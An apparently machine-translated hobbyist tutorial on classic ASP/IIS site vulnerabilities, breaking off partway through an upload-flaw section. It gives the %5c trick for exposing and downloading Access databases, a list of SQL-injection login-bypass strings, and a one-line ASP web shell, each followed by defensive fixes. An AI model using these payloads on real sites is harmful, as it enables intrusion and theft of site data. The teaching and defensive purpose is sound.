Information Source: evil baboons Information Security Team
Author: outstand
Preface:
I recently graduated from the design project and learned about the security issues that asp should pay attention to. I have been wondering for a long time and I have not considered this issue myself, this classmate is too serious! After learning html, javascript, and asp, do you all want to create a personal homepage and link it to the Internet? Have you made several pages after half a day, finally, I went to the Internet to find a change in the background and mounted the network. Now, you should pay attention to common security vulnerabilities. Although they are old, new users do not know this, so they always make this mistake. So according to my previous experience in changing others' systems, I have summarized it as an explanation of him. Hey hey, when a newbie comes in, it's just like a cainiao. I don't know. It doesn't mean it doesn't exist! The following describes how to change the homepage!
1. Database explosion
Principle:
The "% 5c" brute-force library method is not a Web page vulnerability, but uses a feature in the iis decoding method. If the iis security settings are incomplete, and the web page designer does not consider the IIS error, it will be exploited. Why use "% 5c "? It is actually a hexadecimal code of "", that is, another notation. When we replace "/" with hexadecimal "% 5c", ie will not convert it. "% 5c" in the address is submitted as is. after iis receives the parsing, it restores % 5c to "", and all the connection files that call the database contain the Server. the MapPath method is used to convert the relative path of a website into an absolute physical path. Why? Because the absolute path must be specified when connecting to the database.
That is to say, the URL directory only indicates the relative position from the root directory. When Server. when the MapPath method converts a relative path to a real path, it is actually combined with three paths to obtain the actual path: the relative path of the webpage currently executed, that is, the relative path from the physical root directory of the website. People who have set iis will know that each website must specify its physical directory on the hard disk, Server. the MapPath method uses the "physical address of the website root directory + complete relative path" to obtain the real physical path. Here, IIS uses "" to indicate the directory relationship of the real path, while "/" to indicate the virtual path, this may be the reason why IE will automatically convert "" to "/" in our address. In iis, "/" and "" represent different meanings, when "" is encountered, it is deemed that it has reached the physical path of the root directory and will not be parsed, but this path does not exist. Of course, the database connection will fail, so IIS will report an error, and give the cause of the error.
We can achieve this only by using "(" % 5c ") between the relative address of the database and its absolute directory address. % 5c is the most likely to be successfully used in the first/on the rightmost side.
Conn. asp (database connection file) brute-force library method. If the first brute-force library method uses an absolute path error, this brute-force library method uses a relative path error. In general, this problem occurs as long as conn. asp is not in the root directory and the calling file is in the root directory. Of course, this statement is also empirical. To be accurate, conn. asp and the file that calls it. If the relative position changes, an error is reported and the database path is exposed.
Exploitation:
The following is a test on my computer: Access
Http: // localhost/198816/index. asp, normal access,
Change the url to http: // localhost/198816% 5cindex. asp with the following error:
Microsoft JET Database Engine (0x80004005)
File E: 10data. mdb not found.
/Data. asp, row 11th
The database burst and the database name and path are obtained;
We can download it,
Enter http: // localhost/198816/data. mdb in ie and the download page is displayed.
After downloading the database, if the database has a password, you can use the access password cracking tool to obtain the password in a few seconds. Now you can browse all the database content, generally, the backend passwords are MD5 encrypted and can be cracked directly on the MD5 website! If you cannot find it, it's luck. If you have enough bots, let's crack it slowly! But no one will do this for brute force cracking!
Similar to the Conn database explosion!
Defense methods:
Add a fault tolerance statement to the database connection file. I added it at the beginning of data. asp,
On Error Resume Next
Add an error handling statement at the end,
If Err Then
Err. Clear
Set Conn = Nothing
Response. Write "fuck! "
Response. End
End If
Now go to the database and you will find that only fuck is output on the page! Database explosion failed!
Let's talk about the failure to download your database even if someone else knows your database path!
2. Database Security
Asp is the most common combination of access databases. The biggest drawback of access databases is that they are easily searched, downloaded, and exposed by accounts and passwords, there are several common methods to prevent database downloads. If you have better methods, please let me know. I am also a cainiao ·~~~~ :
1. Change the database to a BT name that you cannot remember. This method is useless for database explosion, and google may also find the database path.
2. Add the # Or % 24 = $ special characters in the database name to prevent downloading using the URL encoding feature.
3. Remove the suffix and do not use the extension. The system can resolve the file to a path and cannot download the file. Of course, the test in XP can be downloaded. My format is fat32. Other systems have not been tested. If someone has tested it, let me know. Thank you!
4. Add the suffix of the system file, for example, change the suffix to. db or. temp. I heard that the system does not allow downloading these files with suffixes!
5. Create a nodown table in the database and select ole object for the field data type.
6. The most common method on the network is to change the database suffix to a suffix that can be parsed by systems such as asp.
6th are the most widely used methods on the Internet, but they are not perfect. If someone else can submit data to the database by leaving a message or other methods, it is dangerous, if <% execute (request ("a") %> is submitted to the database, you can execute this statement to access the database, so that you can execute any submitted code.
Of course, this can also be eliminated. We can add statements such as <% loop <% 1 = 2 <% 2 = 1 to the ole object, enable asp errors to prevent downloading. I used two methods to achieve this effect.
Create a nodown table, nodown field, select ole object for the type, and create a text file. The content is <% loop <% 1 = 2 <% 2 = 1, open the nodown table, select the nodown field, right-click the insert object, select create by file, browse to the created text file, add to the nodown table, and change the database to asp suffix. the following error occurs during access:
Active Server Pages, ASP 0116 (0x80004005)
The Script block lacks the Script close mark (%> ).
/198816/dataasp. asp, 577th rows
Indicates successful implementation. Note that the nodown table must be in front of other tables! (I don't know if I need it ).
II.
Use asp code to add nodown tables and fields to the database. The Code is as follows:
<%
Db = "data. mdb" 'Here is the database address.
Set conn = Server. CreateObject ("ADODB. Connection ")
Constr = "Provider = Microsoft. Jet. OLEDB.4.0; Data Source =" & Server. MapPath ("" & db &"")
Conn. Open constr
Conn.exe cute ("create table nodown (notdown oleobject )")
Set rs = server. createobject ("adodb. recordset ")
SQL = "select * from nodown"
Rs. open SQL, conn, 1, 3
Rs. addnew
Rs ("nodown"). appendchunk (chrB (asc ("<") & chrB (asc ("% ")))
Rs. update
Rs. close
Set rs = nothing
Conn. close
Set conn = nothing
%>
There are still many methods on the Internet. I will not repeat these two methods. There is another problem with the database, that is, the database size does not change after a large amount of data is deleted. Here, you only need to use the tool> database utility> to compress and fix the database!
My settings are as follows:
Password settings are complex and MD5 encryption. Use the first method to add the nodwon table and field, and change the database suffix to asp, change the name to % 24 # $ % da # % ta @ # % conn #. asp.
I think the personal homepage is safe, but the security is not absolute.
Password 30 thousand
This is the legendary or = or. Although it is very harmful, you can directly review the background verification and enter the background, but it is indeed everywhere.
Principle:
If both input or = or, the following statement is true,
SQL = "select * from admin where adminname =" & request. form ("adminname) &" and adminpass = "& request. form (" adminpass ") &" "becomes
SQL = "select * from admin where adminname =" or = or "and adminpass =" or = or"
Returns the true result and skips authentication.
Exploitation:
Either the background account or password can be used:
1: "or" a "="
2:) or (a =
3: or 1 = 1 --
4: or 1 = 1 --
5: aor 1 = 1 --
6: "or 1 = 1 --
7: ora =
8: "or" = "a =
9: or =
10: or = or
11: the shortest universal login password or1
12: or 1 or = or
There are many others!
Precaution:
One way is to filter out single quotes, as if other databases still need to filter out other single quotes encoding. For example:
Dim name, Pass
Name = replace (trim (request. Form ("name ")),"","")
Pass = md5 (replace (trim (request. form ("Pass ")),"",""))
I also used the login verification,
Ivcode = trim (request. form ("ivcode"), ivcode is a variable written in the configuration asp file, so security is better, even if you know the password, this vulnerability exists, do not know the defined ivcode value, you cannot log on to the background!
4. Upload
The upload vulnerability is hard to understand. Maybe you are not familiar with packet capture, package modification, and nc upload. You can perform multiple exercises. The personal homepage can be used to upload various files, such as rar, gif, swf, and so on. These files must be stored in different categories, so that the upload type is selected during uploading, if you want to pass the type path to the upload page, are you familiar with it? In fact, this has formed an upload vulnerability!
Principle:
1. FilePath. This is a variable. It is the variable for transferring the upload page to the Save page.